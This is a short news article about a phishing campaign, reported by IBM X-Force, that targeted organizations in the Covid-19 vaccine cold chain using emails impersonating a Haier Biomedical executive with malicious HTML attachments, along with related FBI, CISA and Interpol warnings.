In brief: Hackers are targeting organizations that ensure coronavirus vaccines are safely transported and stored in temperature-controlled environments, a process known as the Covid-19 cold chain. The attacks consist of a phishing campaign that has spanned six countries, and while the group responsible has not been identified, previous similar incidents have been linked to the Chinese, Russian, Iranian, and North Korean governments.
The revelation comes from the IBM Security X-Force team, which writes that while firm attribution could not be established for the campaign, it bears all the “potential hallmarks of nation-state tradecraft.”
The spear-phishing emails are disguised using the name of a business executive from Haier Biomedical, a Chinese company part of the UN’s official Cold Chain Equipment Optimization Platform (CCEOP) program.
The emails were sent to “executives in sales, procurement, information technology and finance positions, likely involved in company efforts to support a vaccine cold chain.” They appear to request quotations for the CCEOP program but actually contain malicious HTML attachments that victims need to download and open locally.
The method removes the requirement of setting up an online phishing page that could be identified and erased by security researchers. Once the recipients enter their credentials, attackers can potentially access companies’ internal networks, allowing them to learn the process, methods, and plans for distributing a Covid-19 vaccine.
“As governments are preparing to roll out vaccines, criminal organizations are planning to infiltrate or disrupt supply chains.”Jürgen Stock, INTERPOL Secretary General
Yesterday saw the UK become the first country in the world to approve the Pfizer/BioNTech vaccine, which has to be kept at a temperature of about -70C (-94F). AstraZeneca’s vaccine, meanwhile, requires a less demanding 36 degrees to 46 degrees Fahrenheit.
As reported by ZDNet, the US Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency have released a security alert about the phishing campaign, while Interpol has warned of an organized crime threat to Covid-19 vaccines.
Image credit: ungvar